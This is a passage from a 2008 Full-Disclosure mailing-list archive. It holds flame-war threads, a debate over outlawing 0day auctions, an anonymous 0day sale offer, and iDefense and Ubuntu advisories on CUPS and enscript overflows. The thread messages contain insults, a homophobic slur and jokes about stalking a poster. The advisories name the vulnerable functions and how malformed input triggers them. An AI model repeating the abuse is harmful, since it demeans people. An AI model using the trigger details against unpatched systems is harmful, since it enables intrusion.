> On Mon, Nov 3, 2008 at 5:13 PM, Chris Jeane <rysheve at gmail.com> wrote:
>> "Power Base of nearly 5000 members"?!?  "i suggest you don't fuck
>> with n3td3v"?1?!?
>>
>> Are you a super villian?
>>
>> On Mon, Nov 3, 2008 at 11:00 AM, n3td3v <xploitable at gmail.com> wrote:
>>>
>>> i have a power base of nearly 5000 members on the n3td3v mailing list,
>>> and i don't work for the government but i very much believe in what
>>> the uk intelligence services are doing. so i suggest you don't fuck
>>> with n3td3v but its your choice at the end of the day. thank you and
>>> good day.
>>>
>>> On Mon, Nov 3, 2008 at 4:31 AM, Biz Marqee <biz.marqee at gmail.com> wrote:
>>> > tl;dr
>>> >
>>> > now i am going back to my real job, doing real things and you can go
>>> > back to
>>> > playing with lego and waiting for your mother to bring in some
>>> > sandwiches
>>> > cut into triangles. without the crust.
>>> >
>>> > faggot.
>>> >
>>>
>>> _______________________________________________
>>> Full-Disclosure - We believe in it.
>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



From ureleet at gmail.com  Mon Nov  3 19:22:27 2008
From: ureleet at gmail.com (Ureleet)
Date: Mon, 3 Nov 2008 14:22:27 -0500
Subject: [Full-disclosure] Securing our computers?
In-Reply-To: <c6465d690811030913u33b7c2bbr6aead22c67951409@mail.gmail.com>
References: <4b6ee9310811012238l49b57897m4f62dc7b7842741d@mail.gmail.com>
	<a741a45f0811022031pc520970y3ff15bfc68fd2a75@mail.gmail.com>
	<4b6ee9310811030900v41c27448qec40180125d5d962@mail.gmail.com>
	<c6465d690811030913u33b7c2bbr6aead22c67951409@mail.gmail.com>
Message-ID: <6158bb410811031122r6378d453kf973c9e99c79318b@mail.gmail.com>

sounds like he was threatening u 2 me?  isnt that what he yells at
everyoen else for?

On Mon, Nov 3, 2008 at 12:13 PM, Chris Jeane <rysheve at gmail.com> wrote:
> "Power Base of nearly 5000 members"?!?  "i suggest you don't fuck
> with n3td3v"?1?!?
>
> Are you a super villian?
>
> On Mon, Nov 3, 2008 at 11:00 AM, n3td3v <xploitable at gmail.com> wrote:
>>
>> i have a power base of nearly 5000 members on the n3td3v mailing list,
>> and i don't work for the government but i very much believe in what
>> the uk intelligence services are doing. so i suggest you don't fuck
>> with n3td3v but its your choice at the end of the day. thank you and
>> good day.
>>
>> On Mon, Nov 3, 2008 at 4:31 AM, Biz Marqee <biz.marqee at gmail.com> wrote:
>> > tl;dr
>> >
>> > now i am going back to my real job, doing real things and you can go
>> > back to
>> > playing with lego and waiting for your mother to bring in some
>> > sandwiches
>> > cut into triangles. without the crust.
>> >
>> > faggot.
>> >
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



From xploitable at gmail.com  Mon Nov  3 19:24:41 2008
From: xploitable at gmail.com (n3td3v)
Date: Mon, 3 Nov 2008 19:24:41 +0000
Subject: [Full-disclosure] Fwd: 0day auctions, should they be outlawed?
In-Reply-To: <e7d032a60811031054hc38cdbr7ef969046279b755@mail.gmail.com>
References: <4b6ee9310811030515la201841rb8f8a261041ad959@mail.gmail.com>
	<4b6ee9310811031043m475574dai75367d94d9d430a9@mail.gmail.com>
	<e7d032a60811031054hc38cdbr7ef969046279b755@mail.gmail.com>
Message-ID: <4b6ee9310811031124k48096515jb2866798517aee3a@mail.gmail.com>

who cares what it means, people are angry, there better be a
government task / strike force being setup for when these offers come
infront of everyone. we can't be complacent about the dangers of these
exploits getting bought by the bad guys. moreover, they shouldn't be
allowed to hold people to ransom when security is at stake. ultimately
they need to be outlawed, and if they can't be, then second best is a
24 hour on stand by task /strike force.

On Mon, Nov 3, 2008 at 6:54 PM, Sandy Vagina <bigsandyvagina at gmail.com> wrote:
> And by "lobbying", you mean continuing to whine on the full-disclosure list?
>
> Sandy
>
> On 11/3/08, n3td3v <xploitable at gmail.com> wrote:
>> i'll be lobbying soon to outlaw 0day auctions, this means the banning
>> of 0day sales on the internet. i've noticed an increased level in 0day
>> sales lately on mailing lists, and web sites... i think this should be
>> against the law. let me know what your opinions are on this, so i can
>> form what im going to say when i lobby people about it. cheers.
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



From ureleet at gmail.com  Mon Nov  3 19:23:45 2008
From: ureleet at gmail.com (Ureleet)
Date: Mon, 3 Nov 2008 14:23:45 -0500
Subject: [Full-disclosure] Odays offers
In-Reply-To: <bc62aa7c0811030336q5d2b34fanc5c4cf7734f22f6a@mail.gmail.com>
References: <bc62aa7c0811030336q5d2b34fanc5c4cf7734f22f6a@mail.gmail.com>
Message-ID: <6158bb410811031123v18969527x8e0a4ac72cf18785@mail.gmail.com>

i haz an idea.  report them to the fucking vendors, like you are
supposed to you shitass. or to uscert.

or, heres an idea, fucking post them on FD.  Isnt' that what FD is for?

On Mon, Nov 3, 2008 at 6:36 AM, anti security <antisec.0day at gmail.com> wrote:
> Dear people,
>
> I 'm proposing some really interesting 0days for Windows && Linux. Please
> answer only by private email.
>
> See you soon
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



From william at lefkovics.net  Mon Nov  3 19:29:47 2008
From: william at lefkovics.net (william at lefkovics.net)
Date: Mon, 3 Nov 2008 12:29:47 -0700
Subject: [Full-disclosure] Fwd: 0day auctions, should they be outlawed?
Message-ID: <43a365c5$17e8ef99$d9ff1b0$@com>

There should be a FD listing fee for the 0day so the list can garner a 
commission from the sale.

Absolutely no increase in government should be directed toward 0day sale 
prevention or enforcement.
The answer to these things rarely should incude the words 'government', 
'task' and 'force'.

----------------------------------------

From: "n3td3v" <xploitable at gmail.com>
Sent: Monday, November 03, 2008 11:00 AM
To: full-disclosure at lists.grok.org.uk
Subject: Re: [Full-disclosure] Fwd: 0day auctions, should they be outlawed? 


On Mon, Nov 3, 2008 at 6:49 PM, Marc Balmer wrote:
> * n3td3v wrote:
>> ---------- Forwarded message ----------
>> From: n3td3v 
>> Date: Mon, Nov 3, 2008 at 1:15 PM
>> Subject: 0day auctions, should they be outlawed?
>> To: n3td3v 
>>
>>
>> i'll be lobbying soon to outlaw 0day auctions, this means the banning
>> of 0day sales on the internet. i've noticed an increased level in 0day
>> sales lately on mailing lists, and web sites... i think this should be
>> against the law. let me know what your opinions are on this, so i can
>> form what im going to say when i lobby people about it. cheers.
>
> wrong approach. there should be a law that the state has to buy
> all 0days and publish them here on undisclosure. that would be
> good use of tax money... ;)
>

the latest guy put up an alias that says "anti security" and i guess
demanded money to make the 0day be known, and then there is still no
guarantee that the affected vendor or the government is going to get
wind of the exploit. that means, there is going to need to be a
government task force in place to infiltrate these sales, to make sure
the good guys are getting the info before blackhat elements. is there
already a government strike force in place to buy these "0day offers"?
or are the government sitting on their hand as per usual? im becoming
increasingly frustrated about what is going on. cheers.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

 
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081103/234aee93/attachment.html 

From xploitable at gmail.com  Mon Nov  3 20:24:41 2008
From: xploitable at gmail.com (n3td3v)
Date: Mon, 3 Nov 2008 20:24:41 +0000
Subject: [Full-disclosure] Securing our computers?
In-Reply-To: <6158bb410811031121t2dc3bf41t1cac4d33a1e87db9@mail.gmail.com>
References: <4b6ee9310811012238l49b57897m4f62dc7b7842741d@mail.gmail.com>
	<a741a45f0811022031pc520970y3ff15bfc68fd2a75@mail.gmail.com>
	<4b6ee9310811030900v41c27448qec40180125d5d962@mail.gmail.com>
	<c6465d690811030913u33b7c2bbr6aead22c67951409@mail.gmail.com>
	<4b6ee9310811030934q511033baq40c75ca510914dc@mail.gmail.com>
	<6158bb410811031121t2dc3bf41t1cac4d33a1e87db9@mail.gmail.com>
Message-ID: <4b6ee9310811031224p78649479i128e4ec3281af097@mail.gmail.com>

are you fucking stalking me? how do you know how long i was away for
etc? have you got obsessive compulsive disorder that you need to reply
to my every post and tell me how long i've been away for? gtfo.

On Mon, Nov 3, 2008 at 7:21 PM, Ureleet <ureleet at gmail.com> wrote:
> btw -- it was nice and sane and quiet on the list for like a week
> without you here.  go back 2 wherever you were.



From labs-no-reply at idefense.com  Mon Nov  3 21:33:56 2008
From: labs-no-reply at idefense.com (iDefense Labs)
Date: Mon, 03 Nov 2008 16:33:56 -0500
Subject: [Full-disclosure] iDefense Security Advisory 11.03.08: Multiple
 Vendor CUPS SGI imagetops Heap Overflow Vulnerability
Message-ID: <490F6E44.4060802@idefense.com>

iDefense Security Advisory 10.09.08
http://labs.idefense.com/intelligence/vulnerabilities/
Oct 09, 2008

I. BACKGROUND

The Common UNIX Printing System, more commonly referred to as CUPS,
provides a standard printer interface for various Unix based operating
systems. "imagetops" is a part of CUPS responsible for creating
PostScript representations of different graphic file formats. For more
information, visit the vendor's website at the following URL.

http://www.cups.org/

II. DESCRIPTION

Remote exploitation of a heap-based buffer overflow vulnerability in
CUPS, as included in various vendors' operating system distributions,
could allow an attacker to execute arbitrary code with the privileges
of the affected service.

The Common Unix Printing System, more commonly referred to as CUPS,
provides a standard printer interface for various Unix-based operating
systems.

The Silicon Graphics Image (SGI) file format parsing module is
vulnerable to a heap-based buffer overflow vulnerability when parsing
malformed Run Length Encoded (RLE) data. The vulnerability exists
within the read_rle16() function. This function doesn't correctly
validate the row count value taken from the file, which is then used to
control how many 16-bit integers to store into a heap-based buffer. By
providing small image dimensions and a large row count, it is possible
to trigger a heap-based buffer overflow.

III. ANALYSIS

Exploitation of this vulnerability results in the execution of arbitrary
code with the privileges of the affected service. Depending on the
underlying operating system and distribution, CUPS may run as the lp,
daemon or a different user.

Exploiting heap overflow vulnerabilities on modern Unix systems can be
difficult due to various heap protection schemes; however, the attacker
has very fine-grained control over the overflow, which somewhat eases
the difficulty of exploitation.

To exploit this vulnerability remotely, the targeted host must be
sharing a printer(s) on the network. If a printer is not being shared,
CUPS only listens on the localhost interface, and the scope of this
vulnerability would be limited to local privilege escalation.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in CUPS
version 1.3.7. Previous versions may also be affected.

V. WORKAROUND

Disabling printer sharing will prevent this vulnerability from being
exploited remotely; however, local exploitation is still possible.

VI. VENDOR RESPONSE

CUPS.org has released a patch which addresses this issue. For more
information, consult their advisory at the following URL.

http://www.cups.org/str.php?L2918

VII. CVE INFORMATION

A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not
been assigned yet.

VIII. DISCLOSURE TIMELINE

09/02/2008  Initial Vendor Notification
10/09/2008  Public Disclosure

IX. CREDIT

This vulnerability was reported to iDefense by regenrecht.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright ? 2008 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerservice at idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
  There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.



From labs-no-reply at idefense.com  Mon Nov  3 21:05:38 2008
From: labs-no-reply at idefense.com (iDefense Labs)
Date: Mon, 03 Nov 2008 16:05:38 -0500
Subject: [Full-disclosure] iDefense Security Advisory 11.03.08: Multiple
 Vendor CUPS texttops Integer Overflow Vulnerability
Message-ID: <490F67A2.8090602@idefense.com>

iDefense Security Advisory 10.09.08
http://labs.idefense.com/intelligence/vulnerabilities/
Oct 09, 2008

I. BACKGROUND

The Common UNIX Printing System, more commonly referred to as CUPS,
provides a standard printer interface for various Unix based operating
systems. "texttops" is a part of CUPS responsible for creating
PostScript representations of text files. For more information, visit
the vendor's website at the following URL.

http://www.cups.org/

II. DESCRIPTION

Remote exploitation of an integer overflow vulnerability in CUPS, as
included in various vendors' operating system distributions, could
allow an attacker to execute arbitrary code with the privileges of the
affected service.

The vulnerability exists within the WriteProlog() function in the
"texttops" application. When calculating the page size used for storing
PostScript data, multiple values that are derived from
attacker-controlled content are used in a multiplication operation.
This calculation can overflow, resulting in an incorrect result for the
total page size. This value is then used to allocate a heap buffer that
is later filled with attacker controlled content, resulting in a heap
buffer overflow.

III. ANALYSIS

Exploitation of this vulnerability results in the execution of arbitrary
code with the privileges of the affected service. Depending on the
underlying operating system and distribution, CUPS may run as the lp,
daemon or a different user.

Exploiting heap overflow vulnerabilities on modern Unix systems can be
difficult due to various heap protection schemes; however, iDefense has
proof-of-concept exploit code that demonstrates code execution is
possible.

To exploit this vulnerability remotely, the targeted host must be
sharing a printer(s) on the network. If a printer is not being shared,
CUPS only listens on the localhost interface, and the scope of this
vulnerability would be limited to local privilege escalation.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in CUPS
version 1.3.7. Previous versions may also be affected.

V. WORKAROUND

Disabling printer sharing will prevent this vulnerability from being
exploited remotely. However, local exploitation is still possible.

VI. VENDOR RESPONSE

CUPS.org has released a patch which addresses this issue. For more
information, consult their advisory at the following URL.

http://www.cups.org/str.php?L2919

VII. CVE INFORMATION

A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not
been assigned yet.

VIII. DISCLOSURE TIMELINE

09/02/2008  Initial Vendor Notification
10/09/2008  Public Disclosure

IX. CREDIT

This vulnerability was reported to iDefense by regenrecht.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright ? 2008 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerservice at idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
  There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.



From erc at pobox.com  Mon Nov  3 21:58:34 2008
From: erc at pobox.com (Ed Carp)
Date: Mon, 3 Nov 2008 13:58:34 -0800
Subject: [Full-disclosure] Securing our computers?
In-Reply-To: <4b6ee9310811031224p78649479i128e4ec3281af097@mail.gmail.com>
References: <4b6ee9310811012238l49b57897m4f62dc7b7842741d@mail.gmail.com>
	<a741a45f0811022031pc520970y3ff15bfc68fd2a75@mail.gmail.com>
	<4b6ee9310811030900v41c27448qec40180125d5d962@mail.gmail.com>
	<c6465d690811030913u33b7c2bbr6aead22c67951409@mail.gmail.com>
	<4b6ee9310811030934q511033baq40c75ca510914dc@mail.gmail.com>
	<6158bb410811031121t2dc3bf41t1cac4d33a1e87db9@mail.gmail.com>
	<4b6ee9310811031224p78649479i128e4ec3281af097@mail.gmail.com>
Message-ID: <1b0d006c0811031358hf33ce3eka4dd85e4699a7e2c@mail.gmail.com>

Jesus ... you guys need to get back on your lithium...



From p.labushev at gmail.com  Mon Nov  3 22:07:17 2008
From: p.labushev at gmail.com (Pavel Labushev)
Date: Tue, 04 Nov 2008 05:07:17 +0700
Subject: [Full-disclosure] Securing our computers?
In-Reply-To: <4e324cb0811030208k16bee8c1ibe9a6f90c2775f46@mail.gmail.com>
References: <4b6ee9310811012238l49b57897m4f62dc7b7842741d@mail.gmail.com>	<45950.1225688371@turing-police.cc.vt.edu>
	<4e324cb0811030208k16bee8c1ibe9a6f90c2775f46@mail.gmail.com>
Message-ID: <490F7615.8030203@gmail.com>

mcwidget ?????:
>     What we *don't* know how to do is make a system that Joe Sixpack is
>     allowed
>     to screw around with, and yet prevent security issues from happening. 

It's not a user's fault that C-like languages' runtime is vulnerable by
design. And it's certainly not a user's fault that C-like languages are
being widely used.
It's not a user's fault that most of widely used hardware platforms and
OSes are lacking of any advanced secure task isolation. And it's
certainly not a user's fault that the currently available isolation
functionality is being misused and overestimated everywhere.
It's not a user's fault that most of widely used software, including
OSes, and protocols has been designed and implemented mostly without
security in mind.

It's mostly the industry's fault. And the industry earns much from it.
I wouldn't blame users, because they are a minor evil in this story.



From and.email.cash at gmail.com  Mon Nov  3 22:45:54 2008
From: and.email.cash at gmail.com (Email Cash)
Date: Mon, 3 Nov 2008 22:45:54 +0000
Subject: [Full-disclosure] Fwd: 0day auctions, should they be outlawed?
In-Reply-To: <43a365c5$17e8ef99$d9ff1b0$@com>
References: <43a365c5$17e8ef99$d9ff1b0$@com>
Message-ID: <6545a5ad0811031445m4d208ca8l9764000cbace3b4d@mail.gmail.com>

I think that ZDI/TippingPoint and the other legit private outfits have
been doing a pretty decent job so far. Why bring the law into it?


On Mon, Nov 3, 2008 at 7:29 PM, william at lefkovics.net
<william at lefkovics.net> wrote:
> There should be a FD listing fee for the 0day so the list can garner a
> commission from the sale.
>
> Absolutely no increase in government should be directed toward 0day sale
> prevention or enforcement.
> The answer to these things rarely should incude the words 'government',
> 'task' and 'force'.
>
>
> ________________________________
> From: "n3td3v" <xploitable at gmail.com>
> Sent: Monday, November 03, 2008 11:00 AM
> To: full-disclosure at lists.grok.org.uk
> Subject: Re: [Full-disclosure] Fwd: 0day auctions, should they be outlawed?
>
> On Mon, Nov 3, 2008 at 6:49 PM, Marc Balmer wrote:
>> * n3td3v wrote:
>>> ---------- Forwarded message ----------
>>> From: n3td3v
>>> Date: Mon, Nov 3, 2008 at 1:15 PM
>>> Subject: 0day auctions, should they be outlawed?
>>> To: n3td3v
>>>
>>>
>>> i'll be lobbying soon to outlaw 0day auctions, this means the banning
>>> of 0day sales on the internet. i've noticed an increased level in 0day
>>> sales lately on mailing lists, and web sites... i think this should be
>>> against the law. let me know what your opinions are on this, so i can
>>> form what im going to say when i lobby people about it. cheers.
>>
>> wrong approach. there should be a law that the state has to buy
>> all 0days and publish them here on undisclosure. that would be
>> good use of tax money... ;)
>>
>
> the latest guy put up an alias that says "anti security" and i guess
> demanded money to make the 0day be known, and then there is still no
> guarantee that the affected vendor or the government is going to get
> wind of the exploit. that means, there is going to need to be a
> government task force in place to infiltrate these sales, to make sure
> the good guys are getting the info before blackhat elements. is there
> already a government strike force in place to buy these "0day offers"?
> or are the government sitting on their hand as per usual? im becoming
> increasingly frustrated about what is going on. cheers.
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



From vulcanius at gmail.com  Mon Nov  3 23:06:39 2008
From: vulcanius at gmail.com (vulcanius)
Date: Mon, 3 Nov 2008 18:06:39 -0500
Subject: [Full-disclosure] Securing our computers?
In-Reply-To: <1b0d006c0811031358hf33ce3eka4dd85e4699a7e2c@mail.gmail.com>
References: <4b6ee9310811012238l49b57897m4f62dc7b7842741d@mail.gmail.com>
	<a741a45f0811022031pc520970y3ff15bfc68fd2a75@mail.gmail.com>
	<4b6ee9310811030900v41c27448qec40180125d5d962@mail.gmail.com>
	<c6465d690811030913u33b7c2bbr6aead22c67951409@mail.gmail.com>
	<4b6ee9310811030934q511033baq40c75ca510914dc@mail.gmail.com>
	<6158bb410811031121t2dc3bf41t1cac4d33a1e87db9@mail.gmail.com>
	<4b6ee9310811031224p78649479i128e4ec3281af097@mail.gmail.com>
	<1b0d006c0811031358hf33ce3eka4dd85e4699a7e2c@mail.gmail.com>
Message-ID: <f398fbb50811031506n7985d343vb32236877272e263@mail.gmail.com>

Actually I think a new game should be created that revolves around stalking
n3td3v. Points would be awarded for the quickest response to each of his
worthless posts. At the end of the month a Stalker of the Month could be
selected and given a prize. Bonus points could be given out for the most
degrading responses. I think it could be a lot of fun.

On Mon, Nov 3, 2008 at 4:58 PM, Ed Carp <erc at pobox.com> wrote:

> Jesus ... you guys need to get back on your lithium...
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081103/1050e271/attachment.html 

From vulcanius at gmail.com  Mon Nov  3 23:00:30 2008
From: vulcanius at gmail.com (vulcanius)
Date: Mon, 3 Nov 2008 18:00:30 -0500
Subject: [Full-disclosure] Fwd: 0day auctions, should they be outlawed?
In-Reply-To: <6545a5ad0811031445m4d208ca8l9764000cbace3b4d@mail.gmail.com>
References: <43a365c5$17e8ef99$d9ff1b0$@com>
	<6545a5ad0811031445m4d208ca8l9764000cbace3b4d@mail.gmail.com>
Message-ID: <f398fbb50811031500g5977b3bfi7b1aeea605eea849@mail.gmail.com>

Because n3td3v is paranoid and believes the government should run just about
everything.

On Mon, Nov 3, 2008 at 5:45 PM, Email Cash <and.email.cash at gmail.com> wrote:

> I think that ZDI/TippingPoint and the other legit private outfits have
> been doing a pretty decent job so far. Why bring the law into it?
>
>
> On Mon, Nov 3, 2008 at 7:29 PM, william at lefkovics.net
> <william at lefkovics.net> wrote:
> > There should be a FD listing fee for the 0day so the list can garner a
> > commission from the sale.
> >
> > Absolutely no increase in government should be directed toward 0day sale
> > prevention or enforcement.
> > The answer to these things rarely should incude the words 'government',
> > 'task' and 'force'.
> >
> >
> > ________________________________
> > From: "n3td3v" <xploitable at gmail.com>
> > Sent: Monday, November 03, 2008 11:00 AM
> > To: full-disclosure at lists.grok.org.uk
> > Subject: Re: [Full-disclosure] Fwd: 0day auctions, should they be
> outlawed?
> >
> > On Mon, Nov 3, 2008 at 6:49 PM, Marc Balmer wrote:
> >> * n3td3v wrote:
> >>> ---------- Forwarded message ----------
> >>> From: n3td3v
> >>> Date: Mon, Nov 3, 2008 at 1:15 PM
> >>> Subject: 0day auctions, should they be outlawed?
> >>> To: n3td3v
> >>>
> >>>
> >>> i'll be lobbying soon to outlaw 0day auctions, this means the banning
> >>> of 0day sales on the internet. i've noticed an increased level in 0day
> >>> sales lately on mailing lists, and web sites... i think this should be
> >>> against the law. let me know what your opinions are on this, so i can
> >>> form what im going to say when i lobby people about it. cheers.
> >>
> >> wrong approach. there should be a law that the state has to buy
> >> all 0days and publish them here on undisclosure. that would be
> >> good use of tax money... ;)
> >>
> >
> > the latest guy put up an alias that says "anti security" and i guess
> > demanded money to make the 0day be known, and then there is still no
> > guarantee that the affected vendor or the government is going to get
> > wind of the exploit. that means, there is going to need to be a
> > government task force in place to infiltrate these sales, to make sure
> > the good guys are getting the info before blackhat elements. is there
> > already a government strike force in place to buy these "0day offers"?
> > or are the government sitting on their hand as per usual? im becoming
> > increasingly frustrated about what is going on. cheers.
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081103/b88e3124/attachment.html 

From michael.boman at gmail.com  Mon Nov  3 23:12:13 2008
From: michael.boman at gmail.com (Michael Boman)
Date: Tue, 4 Nov 2008 00:12:13 +0100
Subject: [Full-disclosure] Securing our computers?
In-Reply-To: <f398fbb50811031506n7985d343vb32236877272e263@mail.gmail.com>
References: <4b6ee9310811012238l49b57897m4f62dc7b7842741d@mail.gmail.com>
	<a741a45f0811022031pc520970y3ff15bfc68fd2a75@mail.gmail.com>
	<4b6ee9310811030900v41c27448qec40180125d5d962@mail.gmail.com>
	<c6465d690811030913u33b7c2bbr6aead22c67951409@mail.gmail.com>
	<4b6ee9310811030934q511033baq40c75ca510914dc@mail.gmail.com>
	<6158bb410811031121t2dc3bf41t1cac4d33a1e87db9@mail.gmail.com>
	<4b6ee9310811031224p78649479i128e4ec3281af097@mail.gmail.com>
	<1b0d006c0811031358hf33ce3eka4dd85e4699a7e2c@mail.gmail.com>
	<f398fbb50811031506n7985d343vb32236877272e263@mail.gmail.com>
Message-ID: <48989dd70811031512x64568ac1x2d66b5ed368ad57a@mail.gmail.com>

I already have a drinking game going, awarding myself a drink for
every time n3td3v says something stupid, and every time I play it I
run out of booze or blacks out... Dangerous stuff... If you are in my
area we can play it together sometime...

Best regards
Michael Boman

On Tue, Nov 4, 2008 at 12:06 AM, vulcanius <vulcanius at gmail.com> wrote:
> Actually I think a new game should be created that revolves around stalking
> n3td3v. Points would be awarded for the quickest response to each of his
> worthless posts. At the end of the month a Stalker of the Month could be
> selected and given a prize. Bonus points could be given out for the most
> degrading responses. I think it could be a lot of fun.
>
> On Mon, Nov 3, 2008 at 4:58 PM, Ed Carp <erc at pobox.com> wrote:
>>
>> Jesus ... you guys need to get back on your lithium...
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
http://michaelboman.org - Security Blog & Wiki



From kees at ubuntu.com  Tue Nov  4 00:14:42 2008
From: kees at ubuntu.com (Kees Cook)
Date: Mon, 3 Nov 2008 16:14:42 -0800
Subject: [Full-disclosure] [USN-660-1] enscript vulnerability
Message-ID: <20081104001442.GE9448@outflux.net>

===========================================================
Ubuntu Security Notice USN-660-1          November 03, 2008
enscript vulnerability
CVE-2008-3863, CVE-2008-4306
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 7.10
Ubuntu 8.04 LTS
Ubuntu 8.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  enscript                        1.6.4-7ubuntu0.2

Ubuntu 7.10:
  enscript                        1.6.4-11ubuntu0.2

Ubuntu 8.04 LTS:
  enscript                        1.6.4-12ubuntu0.8.04.1

Ubuntu 8.10:
  enscript                        1.6.4-12ubuntu0.8.10.1

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

Ulf H?rnhammar discovered multiple stack overflows in enscript's handling of
special escape arguments.  If a user or automated system were tricked into
processing a malicious file with the "-e" option enabled, a remote attacker
could execute arbitrary code or cause enscript to crash, possibly leading
to a denial of service.


Updated packages for Ubuntu 6.06 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/e/enscript/enscript_1.6.4-7ubuntu0.2.diff.gz
      Size/MD5:    21257 099ec23f341d2d17283bde9b36942ab6
    http://security.ubuntu.com/ubuntu/pool/main/e/enscript/enscript_1.6.4-7ubuntu0.2.dsc
      Size/MD5:      674 432f64fe62d7d29e13872525726cb032
    http://security.ubuntu.com/ubuntu/pool/main/e/enscript/enscript_1.6.4.orig.tar.gz
      Size/MD5:  1036734 b5174b59e4a050fb462af5dbf28ebba3

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/e/enscript/enscript_1.6.4-7ubuntu0.2_amd64.deb
      Size/MD5:   423482 636c62e47e3e73b9389b47bfcc8c6647

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/e/enscript/enscript_1.6.4-7ubuntu0.2_i386.deb
      Size/MD5:   405530 41f6c81e90905043fa9018d8f4e30457

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/e/enscript/enscript_1.6.4-7ubuntu0.2_powerpc.deb
      Size/MD5:   419126 6c80126f37f4800f0507329dd6bb0aa3

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/e/enscript/enscript_1.6.4-7ubuntu0.2_sparc.deb
      Size/MD5:   411222 47084632ebb468a3d13f52dcee9dd977

Updated packages for Ubuntu 7.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/e/enscript/enscript_1.6.4-11ubuntu0.2.diff.gz
      Size/MD5:    91026 c788b4b331ad7ddd6a2743ae27f725a4
    http://security.ubuntu.com/ubuntu/pool/main/e/enscript/enscript_1.6.4-11ubuntu0.2.dsc
      Size/MD5:      767 084a84daf7f8b47f2ac3bf3debb995ea
    http://security.ubuntu.com/ubuntu/pool/main/e/enscript/enscript_1.6.4.orig.tar.gz
